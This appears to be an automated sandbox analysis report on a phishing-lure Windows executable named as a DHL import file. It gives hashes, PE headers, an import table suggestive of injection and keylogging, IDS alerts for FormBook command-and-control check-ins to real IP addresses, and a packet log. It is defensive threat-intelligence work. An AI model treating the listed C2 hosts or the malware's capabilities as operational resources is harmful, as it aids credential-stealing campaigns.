File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.417435584833825
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL_IMPORT_8236820594.exe
File size:	1'607'168 bytes
MD5:	9711bd672d1a08a3ee97bc0b7afcbac5
SHA1:	2badf5e83881cbd8e56c4c6d06135d41150d8063
SHA256:	9f0af38d3b2b10dfb7206c429731828f5de95fbc6f54ec2d548686893256fb8f
SHA512:	a4120e249f0964b63f083e5cba19d076262be453a7d8f7dfe07989be5f03622dfe795268a8aaa22797ad817f64689c0bba4031ddffa382cd7102dfeba3da0765
SSDEEP:	24576:0qDEvCTbMWu7rQYlBQcBiT6rprG8acaW3wjuL8FMfzPzoLbRtmFZQRdmBVrTAoK:0TvC/MTQYxsWR7acajjRyw1t6aR
TLSH:	A175D0027391C022FF9BA2334F5AF61157BC6A260523AA1F13A81D7DBD705B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x672962B7 [Tue Nov 5 00:11:35 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FB6F0BE6A03h
jmp 00007FB6F0BE630Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FB6F0BE64EDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FB6F0BE64BAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FB6F0BE90ADh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FB6F0BE90F8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FB6F0BE90E1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xb1adc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x186000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xb1adc	0xb1c00	6df992c700404ad6c61a64a3c1644b43	False	0.9641130450070323	data	7.964519427135522	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x186000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd44a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd45c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd48b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd49d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5880	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd6690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8c38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xd9ce0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_STRING	0xda148	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xda6dc	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdad68	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb1f8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdb7f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdbe50	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc2b8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc410	0xa9174	data			1.0003190893392395
RT_GROUP_ICON	0x185584	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1855fc	0x14	data	English	Great Britain	1.15
RT_VERSION	0x185610	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1856ec	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-05T07:11:19.198896+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.4	49730	TCP
2024-11-05T07:11:58.071385+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.4	49738	TCP
2024-11-05T07:11:58.092036+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49737	188.114.96.3	80	TCP
2024-11-05T07:12:00.654540+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49739	188.114.96.3	80	TCP
2024-11-05T07:12:03.191808+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49741	188.114.96.3	80	TCP
2024-11-05T07:12:11.438629+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49791	3.33.130.190	80	TCP
2024-11-05T07:12:14.042587+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49807	3.33.130.190	80	TCP
2024-11-05T07:12:16.646708+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49822	3.33.130.190	80	TCP
2024-11-05T07:12:25.810847+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49874	154.23.184.95	80	TCP
2024-11-05T07:12:28.310942+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49889	154.23.184.95	80	TCP
2024-11-05T07:12:30.904519+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49903	154.23.184.95	80	TCP
2024-11-05T07:12:39.782752+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49953	172.67.185.22	80	TCP
2024-11-05T07:12:42.367794+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49968	172.67.185.22	80	TCP
2024-11-05T07:12:44.911024+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49983	172.67.185.22	80	TCP
2024-11-05T07:12:54.084875+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50020	206.119.82.172	80	TCP
2024-11-05T07:12:57.076480+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50021	206.119.82.172	80	TCP
2024-11-05T07:12:59.141530+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50022	206.119.82.172	80	TCP
2024-11-05T07:13:17.185898+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50024	103.191.208.137	80	TCP
2024-11-05T07:13:19.732898+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50025	103.191.208.137	80	TCP
2024-11-05T07:13:22.279673+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50026	103.191.208.137	80	TCP
2024-11-05T07:13:32.923725+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50028	3.111.160.216	80	TCP
2024-11-05T07:13:35.451522+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50029	3.111.160.216	80	TCP
2024-11-05T07:13:38.029659+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50030	3.111.160.216	80	TCP
2024-11-05T07:13:46.767905+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50032	203.161.49.193	80	TCP
2024-11-05T07:13:49.293655+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50033	203.161.49.193	80	TCP
2024-11-05T07:13:51.896491+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50034	203.161.49.193	80	TCP
2024-11-05T07:14:00.219061+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50036	188.114.97.3	80	TCP
2024-11-05T07:14:02.740579+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50037	188.114.97.3	80	TCP
2024-11-05T07:14:05.301303+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50038	188.114.97.3	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 07:11:39.695382118 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:39.700311899 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:39.700392008 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:39.707813978 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:39.712635994 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.382801056 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.382934093 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.382944107 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.382955074 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.382966042 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.382975101 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.382987022 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.382994890 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.383007050 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.383018017 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.383076906 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.383076906 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.383076906 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.385405064 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.388382912 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.388421059 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.388437986 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.388469934 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.388628006 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.411273956 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.411283970 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.411493063 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.500112057 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.500133038 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.500143051 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.500257015 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.500509977 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.500533104 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.504875898 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.504887104 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.504961967 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.505321026 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.505331993 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.505342007 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.505388975 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.509608984 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.509622097 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.509639025 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.509651899 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.509679079 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.532293081 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.532304049 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.532315016 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.532561064 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.621403933 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.621414900 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.621423960 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.621474981 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.621643066 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.621653080 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.621664047 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.621682882 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.621696949 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.621999025 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.622009993 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.622020006 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.622056961 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.622416973 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.622454882 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.622457027 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.622467041 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.622504950 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.653582096 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.653590918 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.653604984 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.653615952 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.653625965 CET	80	49736	38.47.237.27	192.168.2.4
Nov 5, 2024 07:11:40.653698921 CET	49736	80	192.168.2.4	38.47.237.27
Nov 5, 2024 07:11:40.653739929 CET	49736	80	192.168.2.4	38.47.237.27
